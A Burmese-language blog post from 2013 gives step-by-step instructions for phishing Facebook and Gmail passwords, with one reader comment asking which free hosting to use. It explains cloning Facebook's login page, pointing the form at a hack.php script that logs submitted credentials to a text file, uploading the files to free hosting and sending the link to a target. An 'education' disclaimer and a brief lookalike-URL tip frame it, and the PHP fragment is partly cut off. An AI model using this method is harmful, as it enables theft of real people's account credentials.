Saturday, 27 April 2013

Facebook and Gmail အေကာင့္ေတြရဲ႕ Password ကို Phishing ျဖင့္ ခိုးယူျခင္း (For Education)

ပထမဆုံး ကိုယ္ဟက္ခ်င္တဲ့ Website login page ကို ေခၚရပါမယ္။ facebook နဲ႔လုပ္ျပပါ့မယ္။ www.facebook.com ကို URL Bar မွာ ရိုက္ထည့္ပါ။ ေပၚလာတဲ့ Page ေပၚမွာ Right Click>>View Page Source ဆိုတာကို ေရြးလိုက္ရင္ Facebook Login နဲ႔ ပတ္သက္တဲ့ ကုတ္ေတြက်လာပါလိမ့္မယ္။ အဲဒီကုတ္ေတြကို အကုန္ Copy+Paste နဲ႔ Notepad File ထဲမွာ ေကာ္ပီကူးထည့္လိုက္ပါ။ ေနာက္တဆင့္ကေတာ့ အေရးႀကီးပါတယ္။ Password ကို ၾကားျဖတ္ခိုးတဲ့ အဆင့္ေလးပါ။ Ctrl+F ကိုသုံးပီးေတာ့ ခုနက Notepad file ထဲမွာ "action" ဆိုတဲ့ စာလုံးေလးကို ရွာပါ။ အဲလိုရွာလိုက္ရင္ action="https://www.facebook.com/login.php?login_attempt=1" method="post" ဒီစာေၾကာင္းေလးကို ရွာေတြ႕ပါလိမ့္မယ္။ အဲဒီဟာကို action="hack.php?" method="post" ဒီလိုေလး ျပင္ေရးလိုက္ပါ။ ပီးေတာ့ ဒီဖိုင္ကို index.html ဆိုတဲ့ နာမည္နဲ႔ Save လုပ္လိုက္ပါ။ ပီးရင္ ပိတ္လိုက္ပါ။ ေနာက္ထပ္ Notepad တစ္ခု အသစ္ဖြင့္လိုက္ပါ။ အဲဒီထဲမွာ ေအာက္က ကုတ္ေတြကို ေကာ္ပီကူးထည့္လိုက္ပါ။
$value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
အဲဒီဖိုင္ကို hack.php ဆိုတဲ့နာမည္နဲ႔ Save လုပ္လိုက္ပါ။ ပီးေတာ့ pswrds.txt ဆိုတဲ့ ဖိုင္အလြတ္တစ္ခုတည္ေဆာက္ထားလိုက္ပါ။ ဒါဆိုရင္ index.html, hack.php, pswrds.txt ဆိုတဲ့ ဖိုင္သုံးခု ရွိပီျဖစ္ပါတယ္။ အဲဒီဖိုင္သုံးခုကို Free Hosting Website တခုမွာတင္လိုက္ပါ။ ပီးေတာ့ index.html ဆိုတဲ့ File ရဲ႕ link ေလးကို ကိုယ္ဟက္လုိတဲ့အေကာင့္ပိုင္ရွင္ဆီပို႔လိုက္ပါ။ တကယ္လို႔သူသာ အဲဒီ Fake Facebook Login Form အတုေပၚမွာ သူ႔ရဲ႕ username and password ရိုက္ပီး ဝင္ခဲ့မယ္ဆိုလ်င္ သူ႔ရဲ႕ username password သင့္ဆီေရာက္လာမွာပါ။ ဘယ္လိုေရာက္လာမွာလဲဆိုရင္ Hosting ေပၚမွာ တင္ထားတဲ့ pswrds.txt ဆိုတဲ့ ဖိုင္ကို download လုပ္လုိက္ရင္ အဲဒီမွာ username and password ေတြကိုေတြ႕ႏိုင္မွာျဖစ္ပါတယ္။ ဘယ္သူ႔ကိုမွ ထိခိုက္ေစဖို႔မရည္ရြယ္ပါဘူး။ သိေစလိုတဲ့ေစတနာနဲ႔ အသိပညာ ျဖန္႔ေဝေပးျခင္းျဖစ္ပါတယ္။ ဆရာ့ဆရာႀကီးေတြအမ်ားႀကီးရွိတယ္ဆိုတာလည္းသိပါတယ္။ ဒါေပမယ့္ မသိေသးတဲ့လူေတြသိေအာင္ သိပီးရင္ ကိုယ့္လဲ အဲဒီ website အတုေတြကို ေရွာင္ရွားႏိုင္ေအာင္ ရည္ရြယ္ပါတယ္။ ကာကြယ္ရန္။ URL bar မွာ www.facebook.com လို႔မေပၚဘဲ www.faceboook.mm အစသျဖင့္ နာမည္ ဆင္တူေလး ေတြကို သတိထားပီးၾကည့္လိုက္ရ္ ဘယ္လိုမွ ကိုယ့္ password မေပါက္ၾကားပါဘူးခင္ဗ်ား။ Enjoy Hacking!!

1 comment:

  1. Free Hosting Website ဆိုတာဘာကိုေျပာတာပါလဲ
    4shared_Desktop_ဆိုတာမ်ိဳးပါလားမသိ

    ReplyDelete